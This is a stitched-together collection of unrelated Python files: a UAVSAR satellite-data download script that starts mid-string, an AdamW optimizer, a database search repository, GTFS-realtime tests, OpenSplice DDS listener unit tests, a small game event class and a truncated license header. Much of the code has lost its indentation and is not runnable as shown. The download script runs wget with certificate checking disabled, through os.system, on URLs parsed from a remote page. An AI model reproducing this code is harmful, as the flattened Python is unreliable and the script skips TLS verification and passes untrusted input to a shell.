\r{thisprog} --campaign NISARA --site 06800 --DryRun
\r**** Download specific datatakes for a campaign and site
\r{thisprog} --campaign NISARA --site 06800 --datatakes 19043_002 19070_004 --DryRun
\r**** Download all datatakes and dems for a campaign and site
\r{thisprog} --campaign NISARA --site 06800 --dem 0 --DryRun
\r**** Download all datatakes and dem from third data take for a campaign and site
\r{thisprog} --campaign NISARA --site 06800 --dem 3 --DryRun
\r**** Download all datatakes and dem from third data take for a campaign and site and selected polarizations
\r{thisprog} --campaign NISARA --site 13905 --dem 1 -p HHHH VVVV HVHV --DryRun
'''.format(thisprog=thisprog)
p = argparse.ArgumentParser(prog=thisprog,description="Earth Big Data's download API for UAVSAR data",epilog=epilog,formatter_class=CustomFormatter)
p.add_argument("-u","--urlroot",required=False, help="ASF DAAC or JPL URLROOT", action='store',default='https://uavsar.asf.alaska.edu')
p.add_argument("-i","--index_file",required=False, help="Locally stored index_file", action='store',default=os.path.join(os.environ['HOME'],'.uavsar','index.html'))
p.add_argument("-d","--datatakes",required=False, nargs='*', help="List of datatakes. If none, get all. Can be any substring after the 'campaign_site' portion of the data take name", action='store',default=None)
p.add_argument("-s","--site",required=False, help="UAVSAR Site code e.g. 06800'",action='store',default='')
p.add_argument("-c","--campaign",required=False, help="NISAR Campaign, .e.g. 'NISARA'",action='store',default='')
p.add_argument("-p","--polarizations", nargs='*',required=False, help="Polariztions",action='store',default=['HHHH','HVHV'])
p.add_argument("-t","--image_types",required=False, nargs='+',help="Image Types",action='store',default=['mlc'],choices=['mlc','slc','grd'])
p.add_argument("-dem","--dem",required=False, help="Download DEM Number from site, number indicates which time step to get, 0 download all. Defaults to no dem download",action='store',default=None,type=int)
p.add_argument("-na","--no_annotation",required=False, help="Do not download the annotationfile .ann",action='store_true',default=False)
p.add_argument("-l","--list_only",required=False, help="only list the urls, do not download",action='store_true',default=False)
p.add_argument("-ldt","--list_datatakes",required=False, help="List all data takes. Can be combined with --campaign --site",action='store_true',default=False)
p.add_argument("-r","--rebuild_index",required=False, help="Rebuilds the local index file from -u",action='store_true',default=False)
p.add_argument("-dryrun","--DryRun",required=False, help="DryRun",action='store_true',default=False)
p.add_argument("-v","--verbose",required=False, help="Verbose output",action='store_true',default=False)
p.add_argument("outdir_root",nargs='?',help="Output directory root. Sub-directories with campain_site will be generated",default=os.path.join(os.environ['HOME'],'Downloads','UAVSAR'))
args=p.parse_args(a[1:])
if not args.site and not args.campaign and not args.list_datatakes:
print('Need --site and --campaign or --list_datatakes.\nFor help:\n{} -h'.format(thisprog))
sys.exit(1)
return args
def rebuild_index(args):
'''Connects to ASF DAAC or JPL to retrieve the top level index.html file
    which will be parsed to retrieve a list of all campaigns and sites'''
urlroot=args.urlroot
with urlopen(urlroot) as res:
res2=res.read().decode()
if not os.path.exists(os.path.dirname(args.index_file)):
os.makedirs(os.path.dirname(args.index_file))
with open(args.index_file,"w") as f:
f.write(res2)
def get_datatakes_from_index(idx_file):
'''reads the local index.html file
    which will be parsed to retrieve lists of all campaigns and sites'''
with open(idx_file,"r") as f:
lines=f.readlines()
uavsar_takes=[x.split('href="')[1].split('/')[0] for x in lines if x.find('href="UA')>-1]
return uavsar_takes
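# Example (hypothetical index.html content): a line containing
#   <a href="UA_NISARA_06800_.../">...</a>
# yields the datatake name 'UA_NISARA_06800_...' in the returned list.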
def get_download_urls(datatakes,args):
urlroot =args.urlroot
datatake_list=args.datatakes
campaign =args.campaign
site =args.site
polarizations=args.polarizations
image_types =args.image_types
no_ann =args.no_annotation
dem_datatake =args.dem
campaign_site=campaign+'_'+site
dt = [x for x in datatakes if x.find(campaign_site)>-1]
if datatake_list:
        dt = [x for x in dt if any(x.find(y) > -1 for y in datatake_list)]
allfiles={}
j=0
try:
for d in dt:
res = urlopen('/'.join([urlroot,d]))
res2=res.read().decode()
res.close()
res=None
dt_urls = ['/'.join([urlroot,d,x.split('">')[0]]) for x in res2.split('href="') if x.startswith(campaign_site)]
if dt_urls:
j+=1
download_dem=False
                if dem_datatake is not None and (dem_datatake==0 or j==dem_datatake):
download_dem=True
dem_ann=[]
if download_dem: dem_ann.append('hgt')
if not no_ann: dem_ann.append('ann')
if args.polarizations:
final_files=[x for x in dt_urls if os.path.splitext(x)[1].replace('.','') in image_types]
                    final_files=[x for x in final_files if any(x.find(y)>-1 for y in args.polarizations)]
final_files+=[x for x in dt_urls if os.path.splitext(x)[1].replace('.','') in dem_ann]
final_files.sort()
allfiles[d]=final_files
return allfiles
except Exception as e:
raise RuntimeError(e)
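# The mapping returned by get_download_urls is keyed by datatake name, with a
# sorted list of file URLs per datatake, e.g. (hypothetical):
#   {'UA_NISARA_06800_...': ['https://uavsar.asf.alaska.edu/.../..._HHHH_....mlc', ...]}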
def download(dl_urls,outdir_root,campaign_site,DryRun=False,verbose=False):
if DryRun:
print("***** DRYRUN: No download. Would attempt to download files for {} datatakes".format(len(dl_urls)))
try:
outdir=os.path.join(outdir_root,campaign_site)
if verbose or DryRun:
print('Download Directory (created if not existing):',outdir)
if not DryRun:
if not os.path.exists(outdir):
os.makedirs(outdir)
# download command --wget works, curl does not.
# dl_verbose ='-v' if verbose else '-s'
#getcmd = 'curl --fail --retry {} {} -C - -k -o'.format(dl_tries,dl_verbose)
dl_verbose ='-v' if verbose else '-q'
getcmd = 'wget -t {} {} -c --no-check-certificate -O'.format(dl_tries,dl_verbose)
for d in dl_urls:
outdir_d = os.path.join(outdir,d)
if not DryRun:
if not os.path.exists(outdir_d):
os.makedirs(outdir_d)
for url in dl_urls[d]:
outfile=os.path.join(outdir_d,os.path.basename(url))
cmd='{} {} {}'.format(getcmd,outfile,url).rstrip('\n')
if verbose or DryRun:
print('Downloading',url)
if not DryRun:
print(cmd)
os.system(cmd)
except Exception as e:
raise RuntimeError(e)
def list_data_takes(datatakes,args):
dt=datatakes
if args.campaign:
dt = [x for x in dt if x.split('_')[1]==args.campaign]
if args.site:
dt = [x for x in dt if x.split('_')[2]==args.site]
for i in dt:
if args.datatakes:
            if any(i.find(x) > -1 for x in args.datatakes):
print(i)
else:
print(i)
def processing(args):
if args.rebuild_index or not os.path.exists(args.index_file):
print('Building UAVSAR datatake index locally:',args.index_file)
sys.stdout.flush()
rebuild_index(args)
datatakes=get_datatakes_from_index(args.index_file)
if args.list_datatakes:
list_data_takes(datatakes,args)
        sys.exit(0)
dl_urls=get_download_urls(datatakes,args)
if args.list_only:
for i in dl_urls:
print(i)
for url in dl_urls[i]:
print(url)
        sys.exit(0)
campaign =args.campaign
site =args.site
campaign_site=campaign+'_'+site
download(dl_urls,args.outdir_root,campaign_site,DryRun=args.DryRun,verbose=args.verbose)
def main(a):
    args=myargsparse(a)
processing(args)
if __name__ == '__main__':
main(sys.argv)
|
# * Optimizer: AdamW
# Referenced third-party code.
# -*- coding: utf-8 -*-
import math
import torch
from torch.optim.optimizer import Optimizer
class AdamW(Optimizer):
"""Implements Adam algorithm.
Arguments:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
lr (float, optional): learning rate (default: 1e-3)
betas (Tuple[float, float], optional): coefficients used for computing
running averages of gradient and its square (default: (0.9, 0.999))
eps (float, optional): term added to the denominator to improve
numerical stability (default: 1e-8)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
amsgrad (boolean, optional): whether to use the AMSGrad variant of this
algorithm from the paper `On the Convergence of Adam and Beyond`_
"""
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8,
weight_decay=0, amsgrad=False):
if not 0.0 <= betas[0] < 1.0:
raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
if not 0.0 <= betas[1] < 1.0:
raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
defaults = dict(lr=lr, betas=betas, eps=eps,
weight_decay=weight_decay, amsgrad=amsgrad)
        super().__init__(params, defaults)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
if grad.is_sparse:
raise RuntimeError('Adam does not support sparse gradients, please consider SparseAdam instead')
amsgrad = group['amsgrad']
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
# Exponential moving average of gradient values
state['exp_avg'] = torch.zeros_like(p.data)
# Exponential moving average of squared gradient values
state['exp_avg_sq'] = torch.zeros_like(p.data)
if amsgrad:
# Maintains max of all exp. moving avg. of sq. grad. values
state['max_exp_avg_sq'] = torch.zeros_like(p.data)
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
if amsgrad:
max_exp_avg_sq = state['max_exp_avg_sq']
beta1, beta2 = group['betas']
state['step'] += 1
# Decay the first and second moment running average coefficient
                exp_avg.mul_(beta1).add_(grad, alpha=1 - beta1)
                exp_avg_sq.mul_(beta2).addcmul_(grad, grad, value=1 - beta2)
if amsgrad:
# Maintains the maximum of all 2nd moment running avg. till now
torch.max(max_exp_avg_sq, exp_avg_sq, out=max_exp_avg_sq)
# Use the max. for normalizing running avg. of gradient
denom = max_exp_avg_sq.sqrt().add_(group['eps'])
else:
denom = exp_avg_sq.sqrt().add_(group['eps'])
bias_correction1 = 1 - beta1 ** state['step']
bias_correction2 = 1 - beta2 ** state['step']
step_size = group['lr'] * math.sqrt(bias_correction2) / bias_correction1
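                # AdamW decouples weight decay from the adaptive update: the
                # decay term (weight_decay * p) is subtracted from the weights
                # directly, instead of being folded into the gradient as an
                # L2 penalty the way plain Adam would.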
                if group['weight_decay'] != 0:
                    decayed_weights = torch.mul(p.data, group['weight_decay'])
                    p.data.addcdiv_(exp_avg, denom, value=-step_size)
                    p.data.sub_(decayed_weights)
                else:
                    p.data.addcdiv_(exp_avg, denom, value=-step_size)
return loss
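# Minimal usage sketch (hypothetical model and data; assumes torch is installed):
#
#   import torch.nn as nn
#   model = nn.Linear(10, 1)
#   opt = AdamW(model.parameters(), lr=1e-3, weight_decay=1e-2)
#   loss = model(torch.randn(4, 10)).pow(2).mean()
#   opt.zero_grad(); loss.backward(); opt.step()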
|
"""Provides functionality for performing database operations on search related tables."""
import typing
import fastapi
import sqlalchemy.orm
import auth.authentication
import models.database
import models.payment
import models.search
import schemas.payment
import schemas.search
class SearchRepository:
"""Class for performing database operations on Searches."""
db: sqlalchemy.orm.Session
def __init__(self, session: sqlalchemy.orm.Session = fastapi.Depends(models.database.get_session)):
"""Initialize the repository with a session provided by Dependency Injection."""
self.db = session
def create_search(self, search_input: schemas.search.SearchBase, exact_matches: typing.List[str],
similar_matches: typing.List[str], user: auth.authentication.User,
payment: schemas.payment.Payment):
"""Write a search and its results to the database."""
model = models.search.Search(criteria=search_input.criteria, type_code=search_input.type, user_id=user.user_id,
account_id=user.account_id)
model.payment = models.payment.Payment(id=payment.id, method=payment.method, status=payment.status)
for match in exact_matches:
model.results.append(models.search.SearchResult(registration_number=match, exact=True, selected=True))
for match in similar_matches:
model.results.append(models.search.SearchResult(registration_number=match, exact=False, selected=False))
self.db.add(model)
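        # flush() emits the INSERT within the current transaction so that
        # database-generated fields are populated before refresh(); the
        # enclosing request/session is expected to commit.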
self.db.flush()
self.db.refresh(model)
return model
def get_search(self, search_id: int):
"""Retrieve a search from the database."""
return self.db.query(models.search.Search).filter(models.search.Search.id == search_id).first()
|
from collections.abc import Iterable
from google.transit import gtfs_realtime_pb2 as gtfs_realtime
from gtfs_realtime_translators.factories import TripUpdate, FeedMessage
def test_models_schema_output():
entity_id = '1'
arrival_time = 1234
trip_id = '1234'
stop_id = '2345'
route_id = '3456'
trip_update = TripUpdate.create(entity_id=entity_id,
arrival_time=arrival_time,
trip_id=trip_id,
stop_id=stop_id,
route_id=route_id)
entities = [ trip_update ]
message = FeedMessage.create(entities=entities)
assert type(message) == gtfs_realtime.FeedMessage
assert type(message.header) == gtfs_realtime.FeedHeader
assert isinstance(message.entity, Iterable)
assert len(message.entity) == 1
entity = message.entity[0]
assert type(entity) == gtfs_realtime.FeedEntity
trip_update = entity.trip_update
assert type(trip_update) == gtfs_realtime.TripUpdate
assert isinstance(trip_update.stop_time_update, Iterable)
assert len(trip_update.stop_time_update) == 1
assert isinstance(trip_update.trip, gtfs_realtime.TripDescriptor)
stop_time_update = trip_update.stop_time_update[0]
assert type(stop_time_update) == gtfs_realtime.TripUpdate.StopTimeUpdate
assert type(stop_time_update.arrival) == gtfs_realtime.TripUpdate.StopTimeEvent
assert type(stop_time_update.departure) == gtfs_realtime.TripUpdate.StopTimeEvent
def test_departure_time_is_used_if_available():
entity_id = '1'
arrival_time = 1234
departure_time = 2345
trip_id = '1234'
stop_id = '2345'
route_id = '3456'
entity = TripUpdate.create(entity_id=entity_id,
arrival_time=arrival_time,
departure_time=departure_time,
trip_id=trip_id,
stop_id=stop_id,
route_id=route_id)
assert entity.trip_update.stop_time_update[0].arrival.time == arrival_time
assert entity.trip_update.stop_time_update[0].departure.time == departure_time
def test_arrival_time_is_used_if_no_departure_time():
entity_id = '1'
arrival_time = 1234
trip_id = '1234'
stop_id = '2345'
route_id = '3456'
entity = TripUpdate.create(entity_id=entity_id,
arrival_time=arrival_time,
trip_id=trip_id,
stop_id=stop_id,
route_id=route_id)
assert entity.trip_update.stop_time_update[0].arrival.time == arrival_time
assert entity.trip_update.stop_time_update[0].departure.time == arrival_time
|
#
# Vortex OpenSplice
#
# This software and documentation are Copyright 2006 to TO_YEAR ADLINK
# Technology Limited, its affiliated companies and licensors. All rights
# reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
'''
Created on Dec 27, 2017
@author: prismtech
'''
import unittest
from dds import Listener, DomainParticipant, Qos, DurabilityQosPolicy, DDSDurabilityKind, DDSException,\
DeadlineQosPolicy, DDSDuration, LivelinessQosPolicy, DDSLivelinessKind,\
OwnershipQosPolicy, DDSOwnershipKind, ResourceLimitsQosPolicy,\
DestinationOrderQosPolicy, DDSDestinationOrderKind, DDSTime,\
PublicationMatchedStatus, SubscriptionMatchedStatus,\
OfferedDeadlineMissedStatus, OfferedIncompatibleQosStatus, QosPolicyId,\
LivelinessLostStatus, LivelinessChangedStatus, RequestedDeadlineMissedStatus,\
RequestedIncompatibleQosStatus, SampleRejectedStatus,\
DDSSampleRejectedStatusKind, SampleLostStatus
import ddsutil
import os
import threading
import time
import collections
Info = collections.namedtuple('Info', ['name', 'type'])
class TestListeners(unittest.TestCase):
idl_path = os.path.join('idl', 'Shapes.idl')
shape_type_name = 'ShapeType'
time_out = 10.0
def _check_status(self, status, type, field_info):
self.assertIsInstance(status, type, 'status is not {}'.format(type))
self.assertEqual(len(field_info), len(type._fields), 'incorrect number of field_info entries')
for n, t in field_info:
self.assertTrue(hasattr(status,n), 'status does not have attr {}'.format(n))
self.assertIsInstance(getattr(status,n), t, 'status.{} is not a {}'.format(n,t))
def test_on_data_available(self):
topic_name = 'ST_on_data_available'
event = threading.Event()
dp1 = DomainParticipant()
gci = ddsutil.get_dds_classes_from_idl(self.idl_path, self.shape_type_name)
ShapeType = gci.get_class('ShapeType')
Inner = gci.get_class('Inner')
t1 = gci.register_topic(dp1, topic_name)
wr1 = dp1.create_datawriter(t1)
class L(Listener):
def on_data_available(self,_):
event.set()
dp2 = DomainParticipant()
t2 = gci.register_topic(dp2, topic_name)
rd2 = dp2.create_datareader(t2,listener=L())
data = ShapeType(color='RED',x=1,y=2,z=3,t=Inner(foo=4))
wr1.write(data)
self.assertTrue(event.wait(self.time_out),'Did not receive on_data_available')
def test_on_inconsistent_topic(self):
'''
from: osplo/testsuite/dbt/api/dcps/c99/utest/listener/code/listener_utests.c
It's not that easy for OpenSplice to generate inconsistent_topic
        events. However, it is built on top of SAC and it works in that
        language binding. We can assume that this test succeeds when
        the other listener tests pass as well...
        So, we will just check that the listeners actually got installed
'''
topic_name = 'ST_on_inconsistent_topic'
event = threading.Event()
gci = ddsutil.get_dds_classes_from_idl(self.idl_path, self.shape_type_name)
# gci2 = ddsutil.get_dds_classes_from_idl(self.idl_path, self.shape_type_name + '2')
class L(Listener):
def on_inconsistent_topic(self, topic, status):
                print('on_inconsistent_topic triggered: topic name = {}, total_count = {}, total_change_count = {}'
                      .format(topic.get_name(), status.total_count, status.total_change_count))
event.set()
dp1 = DomainParticipant(listener=L())
self.assertIsNotNone(dp1.listener, "DomainParticipant Listener was not set")
t1 = gci.register_topic(dp1, topic_name, listener=L())
self.assertIsNotNone(t1.listener, "Topic Listener was not set")
# t2qos = Qos([DurabilityQosPolicy(DDSDurabilityKind.PERSISTENT)])
# try:
# t2 = gci2.register_topic(dp2, topic_name, qos=None)
# self.fail("expected this topic registeration to fail")
# except DDSException as e:
# pass
#
# try:
# self.assertTrue(self.event.wait(self.time_out),'Did not receive on_inconsistent_topic')
# finally:
# pass
def test_data_available_listeners(self):
dp_on_data_available_event = threading.Event()
dp_on_publication_matched_event = threading.Event()
dp_on_subscription_matched_event = threading.Event()
p_on_publication_matched_event = threading.Event()
s_on_data_available_event = threading.Event()
s_on_subscription_matched_event = threading.Event()
wr_on_publication_matched_event = threading.Event()
rd_on_data_available_event = threading.Event()
rd_on_subscription_matched_event = threading.Event()
opm_event = threading.Event()
osm_event = threading.Event()
oda_event = threading.Event()
pub_match_status = None
sub_match_status = None
class DPL(Listener):
def on_data_available(self,reader):
dp_on_data_available_event.set()
oda_event.set()
def on_publication_matched(self,writer,status):
dp_on_publication_matched_event.set()
opm_event.set()
def on_subscription_matched(self,reader,status):
dp_on_subscription_matched_event.set()
osm_event.set()
class PL(Listener):
def on_publication_matched(self,writer, status):
p_on_publication_matched_event.set()
class SL(Listener):
def on_data_available(self,reader):
s_on_data_available_event.set()
oda_event.set()
def on_subscription_matched(self,reader, status):
s_on_subscription_matched_event.set()
osm_event.set()
class WL(Listener):
def on_publication_matched(self,writer, status):
nonlocal pub_match_status
pub_match_status = status
wr_on_publication_matched_event.set()
opm_event.set()
class RL(Listener):
def on_data_available(self,reader):
rd_on_data_available_event.set()
oda_event.set()
def on_subscription_matched(self,reader, status):
nonlocal sub_match_status
sub_match_status = status
rd_on_subscription_matched_event.set()
osm_event.set()
dp = DomainParticipant(listener=DPL())
self.assertIsInstance(dp.listener, DPL, 'listener is not a DPL')
topic_name = 'ST_data_available_listeners'
gci = ddsutil.get_dds_classes_from_idl(self.idl_path, self.shape_type_name)
t = gci.register_topic(dp, topic_name)
pub = dp.create_publisher(listener=PL())
self.assertIsInstance(pub.listener, PL, 'listener is not a PL')
sub = dp.create_subscriber(listener=SL())
self.assertIsInstance(sub.listener, SL, 'listener is not a SL')
wr = pub.create_datawriter(t, listener=WL())
self.assertIsInstance(wr.listener, WL, 'listener is not a WL')
rd = sub.create_datareader(t, listener=RL())
self.assertIsInstance(rd.listener, RL, 'listener is not a RL')
ShapeType = gci.get_class('ShapeType')
Inner = gci.get_class('Inner')
data = ShapeType(color='GREEN', x=22, y=33, z=44, t=Inner(foo=55))
# time.sleep(1.0)
wr.write(data)
TriggerState = collections.namedtuple('TriggerState',[
'opm',
'osm',
'oda',
])
actual_trigger_state = TriggerState(
opm_event.wait(self.time_out),
osm_event.wait(self.time_out),
oda_event.wait(self.time_out))
print(actual_trigger_state)
self.assertEqual(
actual_trigger_state,
TriggerState(True, True, True)
, 'Not all events triggered')
EventState = collections.namedtuple('EventState',[
'dp_opm',
'p_opm',
'wr_opm',
'dp_osm',
's_osm',
'rd_osm',
'dp_oda',
's_oda',
'rd_oda',
])
actual_event_state = EventState(
dp_on_publication_matched_event.is_set(),
p_on_publication_matched_event.is_set(),
wr_on_publication_matched_event.is_set(),
dp_on_subscription_matched_event.is_set(),
s_on_subscription_matched_event.is_set(),
rd_on_subscription_matched_event.is_set(),
dp_on_data_available_event.is_set(),
s_on_data_available_event.is_set(),
rd_on_data_available_event.is_set(),
)
expected_event_state = EventState(
False, False, True,
False, False, True,
False, False, True,
)
print(actual_event_state)
self.assertEqual(actual_event_state, expected_event_state, 'Incorrect listeners triggered')
# time.sleep(1.0)
# self.assertTrue(wr_on_publication_matched_event.wait(self.time_out), 'wr_on_publication_matched_event')
# self.assertTrue(rd_on_subscription_matched_event.wait(self.time_out), 'rd_on_subscription_matched_event')
self._check_status(pub_match_status, PublicationMatchedStatus, [
Info('total_count', int),
Info('total_count_change', int),
Info('current_count', int),
Info('current_count_change', int),
Info('last_subscription_handle', int),
])
self._check_status(sub_match_status, SubscriptionMatchedStatus, [
Info('total_count', int),
Info('total_count_change', int),
Info('current_count', int),
Info('current_count_change', int),
Info('last_publication_handle', int),
])
def test_on_offered_deadline_missed(self):
handlerTriggered = threading.Event()
write_time = 0.0
delay = 0.0
saved_status = None
class L(Listener):
def on_offered_deadline_missed(self, writer, status):
nonlocal delay
nonlocal saved_status
handlerTriggered.set()
saved_status = status
delay = time.time() - write_time
dp = DomainParticipant()
topic_name = 'ST_on_offered_deadline_missed'
gci = ddsutil.get_dds_classes_from_idl(self.idl_path, self.shape_type_name)
t = gci.register_topic(dp, topic_name)
wqos = Qos(policies=[
DeadlineQosPolicy(DDSDuration(1,0))
])
wr = dp.create_datawriter(t, wqos, L())
rd = dp.create_datareader(t)
ShapeType = gci.get_class('ShapeType')
Inner = gci.get_class('Inner')
data = ShapeType(color='GREEN', x=22, y=33, z=44, t=Inner(foo=55))
wr.write(data)
write_time = time.time()
self.assertTrue(handlerTriggered.wait(self.time_out), 'Event not triggered')
self.assertGreaterEqual(delay, 1.0 - 0.05, 'Delay not >= 1.0s')
self._check_status(saved_status, OfferedDeadlineMissedStatus, [
Info('total_count', int),
Info('total_count_change', int),
Info('last_instance_handle', int),
])
def test_on_offered_incompatible_qos(self):
handlerTriggered = threading.Event()
saved_status = None
class L(Listener):
def on_offered_incompatible_qos(self, writer, status):
nonlocal saved_status
saved_status = status
handlerTriggered.set()
dp = DomainParticipant()
topic_name = 'ST_on_offered_incompatible_qos'
gci = ddsutil.get_dds_classes_from_idl(self.idl_path, self.shape_type_name)
t = gci.register_topic(dp, topic_name)
wqos = Qos(policies=[
DurabilityQosPolicy(DDSDurabilityKind.VOLATILE)
])
rqos = Qos(policies=[
DurabilityQosPolicy(DDSDurabilityKind.TRANSIENT)
])
wr = dp.create_datawriter(t, wqos, L())
rd = dp.create_datareader(t,rqos)
ShapeType = gci.get_class('ShapeType')
Inner = gci.get_class('Inner')
data = ShapeType(color='GREEN', x=22, y=33, z=44, t=Inner(foo=55))
wr.write(data)
self.assertTrue(handlerTriggered.wait(self.time_out), 'Event not triggered')
self._check_status(saved_status, OfferedIncompatibleQosStatus, [
Info('total_count', int),
Info('total_count_change', int),
Info('last_policy_id', QosPolicyId),
])
def test_liveliness(self):
handlerTriggered = threading.Event()
aliveTriggered = threading.Event()
notaliveTriggered = threading.Event()
write_time = 0.0
delay = 0.0
saved_lost_status = None
saved_changed_status = None
class L(Listener):
def on_liveliness_lost(self, writer, status):
nonlocal delay
nonlocal saved_lost_status
saved_lost_status = status
handlerTriggered.set()
delay = time.time() - write_time
class RL(Listener):
def on_liveliness_changed(self, reader, status):
nonlocal saved_changed_status
saved_changed_status = status
if status.alive_count == 1:
aliveTriggered.set()
else:
notaliveTriggered.set()
qos = Qos(policies=[
LivelinessQosPolicy(DDSLivelinessKind.MANUAL_BY_TOPIC,
DDSDuration(1,0)),
OwnershipQosPolicy(DDSOwnershipKind.EXCLUSIVE)
])
dp = DomainParticipant()
topic_name = 'ST_liveliness'
gci = ddsutil.get_dds_classes_from_idl(self.idl_path, self.shape_type_name)
t = gci.register_topic(dp, topic_name, qos)
wr = dp.create_datawriter(t, qos=qos, listener=L())
rd = dp.create_datareader(t, qos=qos, listener=RL())
ShapeType = gci.get_class('ShapeType')
Inner = gci.get_class('Inner')
data = ShapeType(color='GREEN', x=22, y=33, z=44, t=Inner(foo=55))
wr.write(data)
write_time = time.time()
self.assertTrue(handlerTriggered.wait(self.time_out), 'Event not triggered')
self.assertGreaterEqual(delay, 1.0 - 0.05, 'Delay not >= 1.0s')
self.assertTrue(aliveTriggered.wait(self.time_out), 'Alive not signaled to reader')
self.assertTrue(notaliveTriggered.wait(self.time_out), 'Not Alive not signaled to reader')
self._check_status(saved_lost_status, LivelinessLostStatus, [
Info('total_count', int),
Info('total_count_change', int),
])
self._check_status(saved_changed_status, LivelinessChangedStatus, [
Info('alive_count', int),
Info('not_alive_count', int),
Info('alive_count_change', int),
Info('not_alive_count_change', int),
Info('last_publication_handle', int),
])
def test_on_requested_deadline_missed(self):
handlerTriggered = threading.Event()
write_time = 0.0
delay = 0.0
saved_status = None
class L(Listener):
def on_requested_deadline_missed(self, reader, status):
nonlocal delay
nonlocal saved_status
saved_status = status
handlerTriggered.set()
delay = time.time() - write_time
dp = DomainParticipant()
topic_name = 'ST_on_requested_deadline_missed'
gci = ddsutil.get_dds_classes_from_idl(self.idl_path, self.shape_type_name)
t = gci.register_topic(dp, topic_name)
qos = Qos(policies=[
DeadlineQosPolicy(DDSDuration(1,0))
])
wr = dp.create_datawriter(t, qos)
rd = dp.create_datareader(t, qos, L())
ShapeType = gci.get_class('ShapeType')
Inner = gci.get_class('Inner')
data = ShapeType(color='GREEN', x=22, y=33, z=44, t=Inner(foo=55))
wr.write(data)
write_time = time.time()
self.assertTrue(handlerTriggered.wait(self.time_out), 'Event not triggered')
self.assertGreaterEqual(delay, 1.0 - 0.05, 'Delay not >= 1.0s')
self._check_status(saved_status, RequestedDeadlineMissedStatus, [
Info('total_count', int),
Info('total_count_change', int),
Info('last_instance_handle', int),
])
def test_on_requested_incompatible_qos(self):
handlerTriggered = threading.Event()
saved_status = None
class L(Listener):
def on_requested_incompatible_qos(self, reader, status):
nonlocal saved_status
saved_status = status
handlerTriggered.set()
dp = DomainParticipant()
topic_name = 'ST_test_on_requested_incompatible_qos'
gci = ddsutil.get_dds_classes_from_idl(self.idl_path, self.shape_type_name)
t = gci.register_topic(dp, topic_name)
wqos = Qos(policies=[
DurabilityQosPolicy(DDSDurabilityKind.VOLATILE)
])
rqos = Qos(policies=[
DurabilityQosPolicy(DDSDurabilityKind.TRANSIENT)
])
wr = dp.create_datawriter(t, wqos)
rd = dp.create_datareader(t,rqos, L())
ShapeType = gci.get_class('ShapeType')
Inner = gci.get_class('Inner')
data = ShapeType(color='GREEN', x=22, y=33, z=44, t=Inner(foo=55))
wr.write(data)
self.assertTrue(handlerTriggered.wait(self.time_out), 'Event not triggered')
self._check_status(saved_status, RequestedIncompatibleQosStatus, [
Info('total_count', int),
Info('total_count_change', int),
Info('last_policy_id', QosPolicyId),
])
def test_on_sample_rejected(self):
handlerTriggered = threading.Event()
saved_status = None
class L(Listener):
def on_sample_rejected(self, reader, status):
nonlocal saved_status
saved_status = status
handlerTriggered.set()
dp = DomainParticipant()
topic_name = 'ST_on_sample_rejected'
gci = ddsutil.get_dds_classes_from_idl(self.idl_path, self.shape_type_name)
t = gci.register_topic(dp, topic_name)
qos = Qos(policies=[
ResourceLimitsQosPolicy(max_samples=1)
])
wr = dp.create_datawriter(t)
rd = dp.create_datareader(t, qos, L())
ShapeType = gci.get_class('ShapeType')
Inner = gci.get_class('Inner')
data1 = ShapeType(color='GREEN', x=22, y=33, z=44, t=Inner(foo=55))
data2 = ShapeType(color='BLUE', x=222, y=233, z=244, t=Inner(foo=255))
wr.write(data1)
self.assertFalse(handlerTriggered.is_set(), 'Event already triggered')
wr.write(data2)
self.assertTrue(handlerTriggered.wait(self.time_out), 'Event not triggered')
self._check_status(saved_status, SampleRejectedStatus, [
Info('total_count', int),
Info('total_count_change', int),
Info('last_reason', DDSSampleRejectedStatusKind),
Info('last_instance_handle', int),
])
def test_on_sample_lost(self):
handlerTriggered = threading.Event()
saved_status = None
class L(Listener):
def on_sample_lost(self, reader, status):
nonlocal saved_status
saved_status = status
handlerTriggered.set()
qos = Qos(policies=[
DestinationOrderQosPolicy(DDSDestinationOrderKind.BY_SOURCE_TIMESTAMP)
])
dp = DomainParticipant()
topic_name = 'ST_on_sample_lost'
gci = ddsutil.get_dds_classes_from_idl(self.idl_path, self.shape_type_name)
t = gci.register_topic(dp, topic_name)
wr = dp.create_datawriter(t, qos)
rd = dp.create_datareader(t, qos, L())
ShapeType = gci.get_class('ShapeType')
Inner = gci.get_class('Inner')
data1 = ShapeType(color='GREEN', x=22, y=33, z=44, t=Inner(foo=55))
t1 = DDSTime(1000,0)
t2 = DDSTime(1001,0)
# write out-of-order samples
wr.write_ts(data1, t2)
rd.take()
wr.write_ts(data1, t1)
self.assertTrue(handlerTriggered.wait(self.time_out), 'Event not triggered')
self._check_status(saved_status, SampleLostStatus, [
Info('total_count', int),
Info('total_count_change', int),
])
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
|
'''
Created on Jan 2, 2015
@author: scarriere
'''
from event.OutgoingEvent import OutgoingEvent
from mathUtils.Direction import Direction
class ThrowMissileEvent(OutgoingEvent):
def __init__(self, characterId, direction):
self.characterId = characterId
self.direction = Direction(direction)
def toString(self):
message = "Game:ThrowMissile:"
message += str(self.characterId) + self.SEPARATOR
message += str(self.direction.value)
return message
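# Example (hypothetical values): ThrowMissileEvent(3, 2).toString() yields
# "Game:ThrowMissile:3" + self.SEPARATOR + "2", with SEPARATOR inherited
# from OutgoingEvent and '2' being the Direction's enum value.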
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
